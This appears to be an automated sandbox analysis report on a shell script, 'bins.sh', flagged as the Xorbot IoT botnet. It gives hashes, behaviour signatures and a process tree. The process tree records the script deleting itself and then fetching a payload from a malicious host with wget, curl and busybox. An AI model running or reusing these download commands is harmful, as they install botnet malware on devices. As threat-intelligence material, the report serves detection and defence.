Analysis

  • max time kernel
    138s
  • max time network
    150s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240226-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    29-11-2024 13:58

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    de53efb865d2702c1ebba6a22269f29c

  • SHA1

    7ffba83c7e1bf358c188ed7187865e8f30e1a4a0

  • SHA256

    22acfc0d6e942b85d7dedb1649db01ef0e39aaac52709cb92a04e20e05789837

  • SHA512

    8071edb71dcf8223e60eb11b54ca7a7f9f256296f360d60819debadb6931412575b5aadd7211ef7a1f01b3467ef14b29b1fae1b845096f3f7095f684e4c77e6e

  • SSDEEP

    192:9drDtt03vb3atYsU4sgJ66msgJ66iwktt03vbRE/:9drDtt03z3aSsUe/tt03zRE/

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:696
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:702
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/j0o2nppKcvyMdefx68huu9x69xhxIXKtd2
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:704
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/j0o2nppKcvyMdefx68huu9x69xhxIXKtd2
          2⤵
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:720
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/j0o2nppKcvyMdefx68huu9x69xhxIXKtd2
          2⤵
          • System Network Configuration Discovery
          PID:805

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/j0o2nppKcvyMdefx68huu9x69xhxIXKtd2

        Filesize

        117KB

        MD5

        849fa04ef88a8e8de32cb2e8538de5fe

        SHA1

        c768af29fe4b6695fff1541623e8bbd1c6f242f7

        SHA256

        8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

        SHA512

        2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf